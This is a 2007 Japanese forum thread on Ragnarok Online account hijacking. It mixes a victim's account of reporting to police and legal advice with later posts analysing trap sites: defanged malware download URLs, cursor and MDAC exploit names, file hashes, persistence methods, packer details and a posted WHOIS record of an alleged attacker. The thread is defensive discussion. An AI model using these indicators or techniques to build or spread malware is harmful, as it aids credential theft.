656 名前:630 ◆tr.t4dJfuU:07/06/01 00:12 ID:N1Jq7jOd0
今日中に準備整えて17時ぐらいに旅立ちます
聞かれた内容などは明日報告させて貰います
一応コテつけましたが邪魔なら言ってください

657 名前:(^ー^*)ノ〜さん:07/06/01 01:58 ID:tiUHKJm40
>>630
630から目を通したんだけど
セキュリティソフトの有無が書かれてないので
気になった。

自分のPCにどんなセキュリティソフトを導入していて
感染時に警告以外の反応すらなかったのか
それとスキャンして特定した時の使用ソフトを
書いてもらえると、参考になるから
できれば書いてもらいたいな。

658 名前:630 ◆tr.t4dJfuU:07/06/01 02:02 ID:N1Jq7jOd0
AVG Anti Virusを使用してますね
スキャンして特定したのかカスペルキーとAVG両方で調べました
AVGで調べた場合は svchost ti2.viewer.dllのうち前者は削除されましたが
後者は引っかかりませんでしたね

659 名前:(^ー^*)ノ〜さん:07/06/01 02:37 ID:tiUHKJm40
>>658
有難う。

取りあえずお返しになるかわからないけど

俺には何のことかさっぱりだけど
「もって行くなら商品券より、ビール券」
ってばっちゃが言ってた。

660 名前:(^ー^*)ノ〜さん:07/06/01 02:43 ID:tiUHKJm40
ゴメン、主語がなかったね。
ばっちゃにもう少し具体的にって言ったら
何かさ、「被害届けじゃ捜査義務は生まれない」
とか、「警察に持って行くなら商品券より、ビール券」

うーん、俺にはさ、何のことか全然わからないし
ばっちゃももう歳だしな、やっぱ気にしないでくれ。

661 名前:(^ー^*)ノ〜さん:07/06/01 04:28 ID:tXPm7u6H0
>>630
感染原因が気になるが、WindowsUpdateの最終実施が先月の20日ぐらいってのが、問題だったのか。
最近新しいタイプのスクリプト使ってたようだし、5月のアップデートをしてなかったのが感染原因かもしれないな。

>>643-644
その2つのファイルは>>435に上がってるのと同じ名称だな。ウイルス名も一致するし。

>>648
オンラインゲームのアイテムと仮想通貨のために捜査をするのではない。
あくまでも不正アクセスという犯罪に対して捜査するんだ。
ウイルスの解析は一般人から見たら難しく思えるが、
専門の会社に依頼すれば、カスペじゃないが、それこそ1時間とかで片が付くよ。
だらだら普通に調査するよりはよっぽど安く付く。

>>649
不正アクセスはれっきとした犯罪だ。
ガムのポイ捨てと同レベルにするのはさすがに無理がある。

>>650
>>104も参考にするべし。もちろんそのSSも大事だが、
そこだけが補填されるということにならないように。

662 名前:(^ー^*)ノ〜さん:07/06/01 13:11 ID:5W6SKyEw0
ぐぐった先のWikiから罠アドを踏みました(旧クルセWiki
丁寧に全てのアドが罠アドにリンクされてます
Trojan-Downloader.JS.Agent.dv
Trojan-Downloader.JS.Agent.bw
Trojan-Downloader.JS.Agent.di
に感染したようですが駆除
rundl132.exeが作成されてましたが削除(rundll132.exeに似ている
被害はまだありませんが対処法がありましたらお願いします

663 名前:(^ー^*)ノ〜さん:07/06/01 13:32 ID:Akb+MKWF0
>>662
スキャンして削除で心配ならOS再インストール。それ以外の対処はない。

あと、安全な環境からのパス変更も忘れずに。

664 名前:(^ー^*)ノ〜さん:07/06/01 13:49 ID:MUWa0L500
垢ハック露店出してる奴や中華っぽいBOTが普通に日本語を話している所を見ると
中華を装った日本人に見えて仕方ない

665 名前:(^ー^*)ノ〜さん:07/06/01 14:41 ID:vH6dGDwf0
>>664
大勢いるよ
例えばキャラメルMAPのシーフはキャラ名、ギルド名、職位はBOT露店商人のような
違和感を感じないし、しかも丁寧な作りのギルドエンブレムまで用意してる

でもキャラの動作は横しないだけでBOTそのものだし
きゃらくえで検索するとシーフの癖にBaseLv70〜90とか明らかに普通じゃない

中華にもうんざりするけど、こんな連中の皮を被る日本人には心底呆れるね

666 名前:630 ◆tr.t4dJfuU:07/06/01 15:04 ID:N1Jq7jOd0
今から行ってきます
色々ご教授ありがとうございました

667 名前:630 ◆tr.t4dJfuU:07/06/01 16:44 ID:N1Jq7jOd0
えっと行ってきました
結論のみ言うと「これは管理会社が悪い」らしいです
公式のハックについての文章持っていきましたが「これは管理会社が逃げてるだけだね」
「警察は犯人を処罰するだけ だが犯人見つかる可能性は全然無し」
「復旧も諦めた方がいい 続けるなとは言わないけど盗まれるの承知で」
まぁこんな事言われました
質問あれば答えますよと

668 名前:(^ー^*)ノ〜さん:07/06/01 16:52 ID:tXPm7u6H0
>>667
いや、その返答は警察も逃げ出してるだけのような気もするんだが・・・
過去に装備が戻ってきたという報告もあるわけで、
警察が動いてくれなきゃどうにもならんのに、そんな返答してくるということは、
最初から警察はやる気ないから、装備は諦めろということなのか?

669 名前:630 ◆tr.t4dJfuU:07/06/01 16:54 ID:N1Jq7jOd0
>>668
あくまでこういう事件があった参考として資料は貰っておく
こういう処理はガンホーがするものであって警察が見つける物ではない
僕「警察などの機関からの要請無ければハックの情報出さないらしいんですが」
警「それは警察に責任なすりつけてるだけ 巧いことやるねこの会社も」
だそうです
@装備とかに関しては関わるつもり無い
「あくまで処罰するだけ」この言葉が目立ってました

670 名前:(^ー^*)ノ〜さん:07/06/01 16:57 ID:kFnqRVr10
>復旧も諦めた方がいい
これの意味がいまいちわからないなー
管理会社がお察しだから対応してくれないという意味なのか668のような意味なのかが

>続けるなとは言わないけど盗まれるの承知で
これはガンIDは変えられないからパス変えてもばれる可能性が高まるからという事かな

671 名前:(^ー^*)ノ〜さん:07/06/01 16:58 ID:kFnqRVr10
リロードしてなかったorz
それと630さんおつかれさま

672 名前:630 ◆tr.t4dJfuU:07/06/01 16:59 ID:N1Jq7jOd0
犯人捕まる見込みは無いし、捜査する気無しって感じでしたね
「どうにかしてでもこいつ探してほしいのか?」など強い口調で聞かれこっちが悪い気分だった
捜査しない→癌の復旧条件にならない からかな
復旧に関しては君と癌でやってくれだそうだ

>続けるなとは言わないけど盗まれるの承知で

ハックされることを前提にゲームやれ みたい感じです

673 名前:(^ー^*)ノ〜さん:07/06/01 17:02 ID:kFnqRVr10
>>672
なるほど捜査しても国外の可能性が高い事がわかってるから
あんまり捜査したくないのかな
ほんとならガンが積極的に対応するべきことなのにね

674 名前:(^ー^*)ノ〜さん:07/06/01 17:06 ID:tXPm7u6H0
>>672
いや、それはなんか外れを引いた感じだな。
確かに警察と一口に言っても、届け出る警察署そして担当者によって
対応が千差万別だとは思う。にして、あまりにも酷い対応なような。

675 名前:630 ◆tr.t4dJfuU:07/06/01 17:08 ID:N1Jq7jOd0
二人居たんだがどっちもネトゲは知らない人だったとは言っておく

676 名前:(^ー^*)ノ〜さん:07/06/01 17:08 ID:Qcv87Fyw0
やる気ねーなーその警察(県警?)。

677 名前:630 ◆tr.t4dJfuU:07/06/01 17:11 ID:N1Jq7jOd0
リアルの金で騒動にならなくて良かったな
高い授業料みたいもんだと思えば良かったんではないか?
だそうですよ

678 名前:(^ー^*)ノ〜さん:07/06/01 17:18 ID:vH6dGDwf0
とりあえず面倒くさがってる県警に押し切られる形で被害届け出さなかったって事?

679 名前:630 ◆tr.t4dJfuU:07/06/01 17:19 ID:N1Jq7jOd0
完全に押し切られましたね
被害届は癌が出す物とか言われてそれ以降一度も話題に出なかった

680 名前:(^ー^*)ノ〜さん:07/06/01 17:20 ID:tXPm7u6H0
日本人が日本国内から自分のIP堂々と使って犯行に及んだとしても、
その警察署じゃ絶対に捕まらないな。

都道府県警察本部のサイバー犯罪相談窓口等一覧
ttp://www.npa.go.jp/cyber/soudan.htm
なんてのがあるが、こういうところに行かないと駄目ということなのか。
ちなみに630氏は普通の警察署に行ったのかな?

681 名前:630 ◆tr.t4dJfuU:07/06/01 17:21 ID:N1Jq7jOd0
北海道在住なんだが一番最寄りの警察署ですね
サイバー犯罪では電話で相談したが、その警察署で届け出出せしか言われなかった

682 名前:(^ー^*)ノ〜さん:07/06/01 17:31 ID:FReOAXxK0
なんか上手いこと丸め込まれた感があるな。

まず、癌はそれが垢ハックであることを証明できない。
ハックされたアカウントがどのIPから接続されたかは分かっても、
それがどこの誰かというところまでは追えないから。
国内に限るが、当事者以外でIPに紐付けられる個人を特定できる
のは警察だけなんだよ。

683 名前:(^ー^*)ノ〜さん:07/06/01 17:31 ID:Akb+MKWF0
つまり
・届け出は出したが、管理会社の責任であると明確に言われた
・管理会社として、不正アクセスかどうか確認し、復旧の措置を要請する
ということを強硬に申し立てるのみだな。

オプションとして
・復旧が行われるまでの間、(支払い済期間分の)利用権は、管理会社により正常に保存されるべきデータが
 保持されていないことにより、プレイを阻害されることになる。この期間分について何等かの形で補填を求める。
 (1dayで課金のケースには当てはまらない)

このオプションは、多分通らない。なぜなら、垢ハックを「踏んでしまった責任・踏んだ後気づかなかった責任・
踏んだ後盗まれるまで放置していた責任」がユーザー側に存在するからだ。

ただし、要求はすべきだろう。調査期間短縮を求める理由になるから。そして、対応しない場合、支払いをしているのに
プレイできない環境となっており、対応しないことを消費者センター辺りに報告するのもいいだろう。

684 名前:(^ー^*)ノ〜さん:07/06/01 17:32 ID:0NZyXmRH0
もう一度サイバーの方に連絡して、その警察にサイバー側から連絡してもらう事もできるかな?
とりあえずやってみれ。盗まれたものがリアル金にされてる事も伝えてみるんだ。
諦めたら負けだよ。

685 名前:630 ◆tr.t4dJfuU:07/06/01 17:33 ID:N1Jq7jOd0
届けだけは出したかったがそこに行くのが厳しい罠

686 名前:(^ー^*)ノ〜さん:07/06/01 17:33 ID:EijVtsxA0
被害届けが出された場合、警察は受け取りを拒否することはできないので、
何を言われようが出すという意思表示することが原則。
その警官は面倒事が増えると思ってで出させないよう誘導したんだろうな。

687 名前:(^ー^*)ノ〜さん:07/06/01 17:34 ID:tiUHKJm40
いや、押し切られてるのが嫌なら
告発調書とってくれって何でいわなかったん?

688 名前:630 ◆tr.t4dJfuU:07/06/01 17:35 ID:N1Jq7jOd0
2名に強硬な口調で言われたら流石に対処が厳しかった

689 名前:(^ー^*)ノ〜さん:07/06/01 17:36 ID:Akb+MKWF0
いや、警察の方も妥当な対応だと思うぞ。癌の対応基準が顧客をなめてるだけで。
書込まれた内容を読む限りでは、警察の対応は至極真っ当。

690 名前:(^ー^*)ノ〜さん:07/06/01 17:36 ID:vH6dGDwf0
警察が面倒事はお断りなんてよく言えるよ、ホント

691 名前:(^ー^*)ノ〜さん:07/06/01 17:41 ID:EijVtsxA0
そもそもユーザーが警察へ行くっていうのは、垢ハクでアイテム奪われたのを癌に申し立てしたら、
警察へ行って被害届けを出せと言われたのが発端だったよな。
警察経由じゃないと癌が動かないのが最大の問題というのはひとまず置いといて、この辺の手順を
きっちり確立しておきたいものだ。
今回のように警察によって対応が違うのは厄介な事この上ない。

692 名前:(^ー^*)ノ〜さん:07/06/01 17:43 ID:tiUHKJm40
てか本当に警察署行って来たのか?
警察官が強硬な口調だと刑訴法無視とか明らかにヤバイんだが。

693 名前:630 ◆tr.t4dJfuU:07/06/01 17:43 ID:N1Jq7jOd0
サイバーの方に電話考えてみたが流石に今回のようにまた押し切られる形になると不味い

纏まり次第電話する予定ですが具体的にはどう攻めれば押し切られずに済むのだろうか

694 名前:630 ◆tr.t4dJfuU:07/06/01 17:44 ID:N1Jq7jOd0
「この犯人どうしても取り締まってほしいならやるけど?」
「でも国外だろうからまず捕まらないから情報流すだけくらいだね」
のような会話でした

695 名前:(^ー^*)ノ〜さん:07/06/01 17:44 ID:tiUHKJm40
すまんミスった・・・
×警察官が強硬な口調だと刑訴法無視とか明らかにヤバイんだが。
○警察官が強硬な口調だと刑訴法無視してよくなると思ってるとか明らかにヤバイんだが。

696 名前:(^ー^*)ノ〜さん:07/06/01 17:49 ID:EijVtsxA0
>>693
具体的な内容はともかく、自分に非がない場合は何事においても会話内容を録音するのが
簡単かつ確実に有効な手段。
録音することをあらかじめ先方に伝えておけば、そうそう邪険な対応をされることもない。
相手が録音を拒否したとしても拒否できる法的根拠はないので突っぱねろ。

697 名前:(^ー^*)ノ〜さん:07/06/01 17:51 ID:Qcv87Fyw0
警察も役所も人間だから、人によって対応がまちまちなのは
仕方がない(いいことだとは思わないが)。

こいつは助けてやりたいと思わせるよう心象を良くするか、
こいつは拒否できないと思わせる材料を用意しつつ
強い意志でこちらが押し通すかだね。

698 名前:(^ー^*)ノ〜さん:07/06/01 17:53 ID:tiUHKJm40
>>696
630はもういいんじゃね?
この調子だと「警察は鉄砲もってるしおっかない。」とか言い出しかねない。

警察も役所も人間だが、対応する人間によって
法律が変わるとか聞いたこと無い。

699 名前:(^ー^*)ノ〜さん:07/06/01 17:54 ID:Akb+MKWF0
警察への要求内容
×垢ハックのアイテムを取り返してくれ→管理会社の仕事なんで受け付けない
○垢ハックしてパスワード盗み出した犯人を捕まえてくれ→まず捕まらないと思うが受理だけはしなければならない

癌への要求内容
○垢ハックであるので調査し、確認が取れたらアイテムとzenyを復旧せよ→正当な要求
   但し、調査の結果、パスワード盗難ではなかったり、偽証の場合は対応されない。
   偽りの依頼の場合、業務妨害扱いになる。
   パスワードが盗まれた原因がユーザー側にある場合(PCのディスプレイに張ってあり誰もが見れたとか)
   管理会社の責ではないので対応されない。今回は、垢ハックトロイの為、ユーザーに責任がないのか
   踏んでしまったり、気づかないで放置した責任がユーザーにあると定義するのかによって対応されるかが
   変動することに注意。垢ハックに関する責任の所在は、現在グレーライン。(悪いのは盗む奴ではあるが)
△垢ハックの相手のアカウントを剥奪してくれ→癌の仕事だがユーザーが指図するのは間違い
△垢ハックの相手のIPを全部弾いて防止してくれ→(同上)
×垢ハックの相手を捕まえてくれ→警察の仕事

700 名前:630 ◆tr.t4dJfuU:07/06/01 17:55 ID:N1Jq7jOd0
両者ともアカウントハックという単語自体知らなかったな
因みに自分未成年でpcの事まったくわからん親付きだったからそれで強硬な態度で来たのかもな

701 名前:(^ー^*)ノ〜さん:07/06/01 17:57 ID:/QILbAHm0
リアルタイムで質疑応答できるしこっちならログも残るけど
この調子だとあまり役には立たない
警察行ってもダメでしたって事なわけだし

今が続くと情報まとめるのにスレが流れすぎる気がするな

702 名前:630 ◆tr.t4dJfuU:07/06/01 17:59 ID:N1Jq7jOd0
サイバー自体には昨日電話したのですが「少なくとも不法アクセスでは届け出せる」
だったのですが実際に行った警察は
「それは管理会社が出す物」の一点張り

703 名前:(^ー^*)ノ〜さん:07/06/01 18:02 ID:FReOAXxK0
>>693
ゲーム内でアイテムを盗まれたというのはとりあえず脇に置いておくんだ。
で、「自分のアカウント」が「自分以外の誰か」によって「不正にアクセス」された
という点を強調する。

被害としては、金銭を支払った自分にのみ提供されるべきサービスを犯人は
不当に享受し、また犯人がログインしている間、自分はサービスを受けられない。
更に、サーバ上にある自分のデータを書き換えられた(←アイテム移動のこと)。
ゲーム内アイテムと言われると、ネットゲームを理解しない人は「それぐらい…」
となりかねないので、ゲーム色を薄めた話に変換するといいかもしれない。

704 名前:(^ー^*)ノ〜さん:07/06/01 18:04 ID:Akb+MKWF0
>>702
実際の警察で、「サイバー窓口ではこのように言われているので受理(または、担当部署に回して)くれ」と
述べるのが正解だったかもな。現時点では、今更…なことだけど。

今後、同じように門前払いされる人が増えないように、サイバー窓口に対し、警察署の名前(わかれば担当者名も)を
伝えて、「このような対応で受理して貰えなかった。わたしは不正アクセスとして届け出たい。どのようにしたら良いか」
と聞いてみてくれ。担当窓口というか上から言ってもらうのが一番だ。

705 名前:630 ◆tr.t4dJfuU:07/06/01 18:06 ID:N1Jq7jOd0
703-704
了解しました
取りあえずそれで今から電話してきます

706 名前:(^ー^*)ノ〜さん:07/06/01 18:10 ID:tiUHKJm40
>>702
まあ、本当に何もしらんのならあれなんで
一応これだけ書いとく。

一番いいのは、大きめの署にいくこと。
被害者が管理会社でも、君は告発はできる。
告発は口頭でもできて、告発を受けた場合
職員は調書をとらなければならなくなる。
被害届けと違って、捜査義務も生まれる。

これらは警察に受理、不受理の裁量権はない。
根拠条文は刑事訴訟法 239条〜242条

以上の事を親にみせてから、もう一度
他をあたってみると良い結果がでるかもしれない。
本当は、親じゃなくて法律屋を連れて行くのが
いいんだがな。

後上でもいわれてるが、サイバー窓口との矛盾をつくのは
効果的とはあまりいえないかも。
もう向こうは法律すら無視する勢いだぞ、そんな輩が
素直にサイバー窓口の指示に従うとは思えん。
あと、警察官でも本当に刑事訴訟法をしらない連中もいるから
注意な。知らないから、自分は正しいと思い込んでる分
本当にどうにもならん。逆切れしてくるかもしれんしな。

707 名前:(^ー^*)ノ〜さん:07/06/01 18:14 ID:AFjbwSDW0
すいません。

http://www■grandchasse■com/wikblog

ここを踏んでしまったのですがどうしたらいいですか?
ウイルススキャンでbodg curなんたらとtest curなんたらはひっかかって削除したんですが
他にするべきことがあったら教えてください・・

708 名前:(^ー^*)ノ〜さん:07/06/01 18:17 ID:/QILbAHm0
まずは落ちついてテンプレを読んでください
他にPCがあれば感染したPCは回線を切ってそちらから見るのが良いでしょう
ROへのログインは控えておきましょう

709 名前:630 ◆tr.t4dJfuU:07/06/01 18:19 ID:N1Jq7jOd0
サイバー今現在電話保留
警察は近辺の行けそうな場所今調べています

710 名前:(^ー^*)ノ〜さん:07/06/01 18:22 ID:938aAawv0
LiveROいけ

711 名前:(^ー^*)ノ〜さん:07/06/01 18:23 ID:tiUHKJm40
>>709
まあ法律無視するような奴らに
法的に捜査義務が生まれようが
本当に捜査するかあやしいけどな。

まあ、いくらか包むしかないんじゃないの?

712 名前:630 ◆tr.t4dJfuU:07/06/01 18:26 ID:N1Jq7jOd0
らいぶろの
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/でいいんかな
サイバー取り扱ってる人間は平日は17:30までだそうなのでまた月曜日かな

713 名前:(^ー^*)ノ〜さん:07/06/01 19:13 ID:S9mb/5kt0
>>712
そのスレでOK。
そこを追い出されるようならまたこのスレに戻ってくるしかない。

>>698
ハズレを引くと、こちらが法に詳しくないのをいいことに適当なこと言ってくるよ。

714 名前:630 ◆tr.t4dJfuU:07/06/01 19:27 ID:N1Jq7jOd0
癌から返答来たのでらいぶろの該当スレにうpしておきました

715 名前:(^ー^*)ノ〜さん:07/06/01 19:41 ID:Akb+MKWF0
>>714
回答を晒すのなら、この辺のスレだと思うが、どこに誤爆したんだ?
資料性のありそうな内容ならここでもいい気がする。

サポートの回答を晒すスレ 11
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1120741309/

セキュリティ対策、質問・雑談スレ2
ttp://enif.mmobbs.com/test/read.cgi/livero/1177485590/

716 名前:(^ー^*)ノ〜さん:07/06/01 19:50 ID:AFjbwSDW0
あの〜、感染してすぐ回線抜いて該当ファイルを削除できたのですが
これで大丈夫なんでしょうか・・?

717 名前:(^ー^*)ノ〜さん:07/06/01 19:57 ID:yr5n0CC60
テンプレくらい読め。

718 名前:(^ー^*)ノ〜さん:07/06/01 20:01 ID:kZWKentL0
12月暮れにアカハクに会いまして、ガンホーと数度のメール交換後、PCでサイバー警察にメールしたところ、地元の警察に不正アクセスに関することって電話してくださいと言われました。

生活安全課ですね と言われそちらで対応していただきました。

電話で数回やりとり後に、警察がログの提出して欲しい+連絡してくださいとメールだしたりして、
私は被害者ではなく、あくまでも被害者はガンホーですので、不正アクセスに関する調書を取りたいので、警察まで来てくださいと言われ、1〜2時間話をしてきました。

こちらの警察は対応も馬鹿にした感じはなく、真面目に対応してくれました。

まだ返事はこないですが、警察は不正アクセスを調べるだけですので、その後の対応は私対ガンホーですので、ゼニーやアイテムの事は言わないほうが言いと思います。

630さんに対する対応は異常だと思います(その場に居なかったのでどの程度かわかりませんが)

地元の警察ででは対応が納得いかないので、その上に相当する警察署に文書なり、電話で言ってみてはいかがでしょうか?

他人ごとながら納得いかないです

719 名前:sage:07/06/01 22:14 ID:lENEek1V0
北海道警察のサイト見てきたけど
相談窓口とか見ても不正アクセスとかサイバー犯罪の
相談窓口とかなかったし、たよりにならなそうだね。

720 名前:(^ー^*)ノ〜さん:07/06/01 22:39 ID:3cWvNuD+0
ゲーム中に、ROリンク集の宣伝ってチャットが立ってるのですが、
これはアカハックサイトですか?
http://www■rojapan■jp

721 名前:(^ー^*)ノ〜さん:07/06/01 22:40 ID:7NTpHq6Q0
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

722 名前:(^ー^*)ノ〜さん:07/06/01 23:08 ID:Qcv87Fyw0
>>719
北海道と言ってもめちゃくちゃ広いからなぁ。札幌みたいな都市ならともかく
牛が逃げたとかの相談しか受けたことがないようなところだと
ネットかゲームの片方を聞いただけでも拒絶反応が起きそう。

723 名前:(^ー^*)ノ〜さん:07/06/01 23:30 ID:USTA7+VY0
垢ハックサイトの報告→このスレ
垢ハックサイトでしょうかという質問→セキュリティスレ(LiveRO)

724 名前:(^ー^*)ノ〜さん:07/06/01 23:38 ID:/QILbAHm0
何度言えばわかってもらえるんだろうな、鑑定スレじゃないってことを
>>720はLiveROで既に報告されてる、Roリンク集で無害と言うことで落ちついてる

725 名前:(^ー^*)ノ〜さん:07/06/02 00:16 ID:CjiR8inF0
>>1 にでっかく書かないとだめだなこりゃ。

726 名前:(^ー^*)ノ〜さん:07/06/02 00:30 ID:gXHzJwl90
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

>>1のこの表現が微妙に分かりにくいんだよなー。
あたかも、そういうスレが別に存在するから、そっちで訊け、みたいな言い回しだけど
実際にはそんなスレどこにもないしなー。普通に

※ このスレは危険URLを鑑定するスレではありません

の方が良いような気がした。

727 名前:(^ー^*)ノ〜さん:07/06/02 00:43 ID:2NxRswYC0
>>720
ノビの名前も英字だし宣伝としか書いてないからな
俺もアカハックだと思ってたよ、どうみても怪しすぎる

728 名前:(^ー^*)ノ〜さん:07/06/02 00:51 ID:zYgGDCm+0
>>726
このスレは「勇気が無くて見られないサイト解説スレ」ではありません

に訂正するべきだな。

729 名前:(^ー^*)ノ〜さん:07/06/02 04:40 ID:wJvGnALw0
>>726
そういうスレはあるぞ。ROの垢ハックのみに対応したスレではないし、
どちらかといえばスレ違いだけど。

730 名前:(^ー^*)ノ〜さん:07/06/02 06:29 ID:pePNKmyN0
>>726
2chのどっかにあるらしいぞ。

731 名前:(^ー^*)ノ〜さん:07/06/02 06:46 ID:d/2V01XR0
あまりひっぱってもしゃあないがな。

732 名前:(^ー^*)ノ〜さん:07/06/02 06:53 ID:aLeT0/ZM0
BSwikiには「『安全であろうと思われる復元ポイント』まで戻してしまう事でウイルスを削除する方法も有ります。」
とありますが、これって確実であろうと思われるポイントで復元したあとならばそのPCでパスの変更はしても大丈夫ということ?

733 名前:(^ー^*)ノ〜さん:07/06/02 07:31 ID:pePNKmyN0
>>732
システムファイルに取り憑いたウィルスであれば、復元で未感染のファイルに戻っていますが、
それ以外のファイルに取り憑いている場合は除去できていません。除去できて、安全な環境に
戻っているかどうかは、ケースによって異なりますので自己責任で判断して下さい。

そして、一般的な質問ですので、次からは、LiveROのセキュスレをご利用下さい。

セキュリティ対策、質問・雑談スレ2
ttp://enif.mmobbs.com/test/read.cgi/livero/1177485590/

734 名前:(^ー^*)ノ〜さん:07/06/02 17:01 ID:49mCu9Oc0
ttp://picopico.dip.jp/ragnarok/upload.do?actionType=1&srvGrp=2
ぴころだの「誰か訳してください。NO!RMT! 」鯖chaos

中華のアカハックサイトの画像の日本語がおかしいって趣向の投稿だろうから安全だとは思うけど、この画像見たらウィルスってことあるかな・・・?

735 名前:(^ー^*)ノ〜さん:07/06/02 17:10 ID:pePNKmyN0
>>734
安全かわからないけど、どうでしょうかっていう相談は、こっちのスレじゃないですよ。

>>1-2
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。
>※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

>【一般的話題用】
>セキュリティ対策、質問・雑談スレ2
> http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

736 名前:(^ー^*)ノ〜さん:07/06/02 17:16 ID:49mCu9Oc0
>>735
なるほどそうでしたか申し訳ない
そっちいってきます

737 名前:にゅぼーん:にゅぼーん
にゅぼーん

738 名前:(^ー^*)ノ〜さん:07/06/03 05:32 ID:BnryPc8d0
飲み会が終わってちょっと寝るためにネカフェに来てみた
ROできるしちょっとだけログインしようかと思ったんだが
ネカフェでやるのは危険か?
もしかしたら俺よりも前に使ってた人が危険サイトにいってしまった可能性もある
ログインせずに寝るわ・・・Zzzzz

739 名前:にゅぼーん:にゅぼーん
にゅぼーん

740 名前:にゅぼーん:にゅぼーん
にゅぼーん

741 名前:(^ー^*)ノ〜さん:07/06/03 08:21 ID:DdM9EzP30
ログ読めばわかるが中国の犯罪者が荒稼ぎしているだけだ。
RMT業者なのかマフィアなのかその両方なのかは知らんが
連中にとっちゃただの損得勘定のビジネスだ。

742 名前:(^ー^*)ノ〜さん:07/06/03 09:25 ID:sO/HHBdP0
先週アカハックアドレスと思われるURLを踏んでしまい、
すぐに対策をしまして、いまのところ被害には遭っていないのですが、
罠URLを踏むとどのくらいの時間で被害に遭うのでしょうか?
ギルメンにアイテムとゼニーを預けてあるのですがもう返してもらっても平気かな?

743 名前:(^ー^*)ノ〜さん:07/06/03 09:32 ID:df48rnaj0
というかパスを変更してあるのなら、大丈夫ではないかえ?

744 名前:(^ー^*)ノ〜さん:07/06/03 10:43 ID:E7J/ljq60
>>738
ネカフェのPC起動時の段階がクリーンであることを確信できれば大丈夫だろう。使う前にPC再起動しろ。
この手の雑談は、LiveROのセキュスレ推奨

>>742-743
・踏んでからどの程度の期間でアクセスされるか
 実験報告が上がっていないので、誰にもわかりません。少なくとも踏んで即座にというのは考えにくいですが。
・除去を行ない、安全な環境からパス変更した後はどうか
 変更後のパスが盗まれていないのにどうやったら盗まれるのか理解に苦しむ

>>738-744
おまいら、まとめてセキュスレ行けや

745 名前:630 ◆tr.t4dJfuU:07/06/03 12:56 ID:HrFs9Hgf0
完全に関係無いスレに誤爆してた…
セキュスレの方に返答張っておきました

746 名前:(^ー^*)ノ〜さん:07/06/04 20:06 ID:SzZKSF3s0
福建人ドメインを探すのに便利なDOMAINTOOLSがここ数日おかしい、
仕様変更でもしたのか?5月30日以降のドメインを確認出来ない。

そんな中リネージュ資料室においてこんなドメインが。
www■playonlinenc■com

登録情報はこのスレで以前に出てた。
おなじみの福建人の仲間と思われる。
どのくらい密接なのかは今のところわからないが、
最低でもQQメッセで日夜罠情報の交換くらいはしてるだろう。
ネット上なら直接顔を合わせて対話する必要も無いしね。

そのURLにはカーソル脆弱性を悪用した罠が1つ、おなじみのインラインフレームがある。
前者はClamWin(ClamAV)でも検出するようなもの。
ClamWIn
test■cur: Exploit.W32.MS05-002 FOUND

カスペ
test■cur - infected by Exploit.Win32.IMG-ANI.ac


登録情報
Domain name: playonlinenc■com

Registrant Contact:
liu huangjun
liu huangjun liu huangjun 51shell@163.com
+86.037167451278 fax: +86.037167451278
hl zz
hl zz hl zz 450000
cn

747 名前:(^ー^*)ノ〜さん:07/06/04 21:01 ID:hEZYRP3r0
EventWikiサーバ別ページ内のアドレスが
www■netgamero■net
に書き換えられていました。ここにアクセスするとjprmthome■comドメインにとばされ、
カーソルの脆弱性をついた攻撃をされる可能性があります。

いずれも222.122.12.32(KOREA TELECOM:222.96.0.0/222.122.255.255)からの犯行。

というわけで、↓のブラックリストに追加。参考までにどうぞ。
ttp://ro.logue.tk/%3Aconfig/spam/BlackList.html
※注意:このリストは、EventWikiやThorWikiのRO系Wikiだけでなく、自サイト、Vana'diel Wiki(FF11)、MarathonWiki(FPS)、PlanetWiki(天文学)を荒らしたホストも含まれています。

中華、韓国以外だとRIPEからのスパムが多い。

748 名前:(^ー^*)ノ〜さん:07/06/04 21:48 ID:tdeZ4q7R0
>746
iframeのはASCIIの7bitの脆弱性を突くタイプっぽかった。
福建人の仲間かどうかは知らないけど、いつものとはちょっと違うタイプにも見えた。

749 名前:(^ー^*)ノ〜さん:07/06/05 03:36 ID:xSYM728Y0
>>746
毎度おなじみのアニメカーソル&MDAC脆弱性利用で下記@のEXEを落とします。実行するとABが作成されます。

@MD5:74FD9155419A0208BE877F46FB57D157 www■playonlinenc■com/svch■exe
AMD5:17A6424A777022289C6B86D784F58C4F → %WinDir%\svchost.exe
BMD5:C9028A19C60FBF246C1B39123A5DBED6 → %WinDir%\system32\tj1viwer.dll

[自動起動設定]
Aサービスに登録(サービス名ADIDown 表示名Power Adapter)
BWinsock Providerに登録

[カスペルスキー検出名]
@Packed.Win32.Morphine.a
ABTrojan-PSW.Win32.Maran.ff

@が初めて見るウイルス名だったので、中身を調べてみたら、
いつも通りのjRO&リネ1狙いのmaranでした。

750 名前:(^ー^*)ノ〜さん:07/06/05 08:10 ID:gTkeo6Ts0
Morphine(モルヒネ)はヨーロッパ(スロバキア?)のrootkit付属の暗号化プログラムで、
基本的には何らかのPackerと併用するようです(今回はUpackに使用)。
ライセンスがGNU GPLのオープソースとなっていてソースが公開されているため
まともなアンチウイルスベンダなら復号できると思われます。
付属のドキュメントには以下のステキな文言が見られることから
カスペには速攻で対応された模様。
 Version 1.6 is about fucking KAV :).
 Well, not only fucking KAV, also second decrypting unit is before loader.

…で、Delphiのソースが公開されているため中国語のGUI版も出回っていて、
それを使ったものかと思われます。PEiDのプラグインも出ている模様。

751 名前:(^ー^*)ノ〜さん:07/06/05 10:38 ID:gTkeo6Ts0
ちょっと面白かったもの。
リネージュ資料室さんの更新状況で見つけたこれ。
www■lovejpjp■com/gr/3he1.exe
メモ帳(笑)でがーっと読むと、途中から何かおかしい。
「23niW rednu nur eb tsum margorp sihT」
これはWin32PEヘッダの
「This program must be run under Win32」
を逆転した物…というか「MZ」が「ZM」、「UPX」が「XPU」、
全バイトひっくり返ってる。これは暗号化と言っていいのか?
すげぇ。ばかばかしいけど、すげぇ。
既知の www■lovejpjp■com/ceshi/ceshi.exe
(このURIもひっくり返ってる)も拾って実行する、
ドロッパやトロイの詰め合わせのようです。
スルーしたNorton、McAfee、バスター、Avast!、AVGなどには提出済み。

ひっくり返っていない最初の方に見えるのはAvenger by NhT。
Google先生に聞いたらロシアのNhT-TeaMの物のようです。

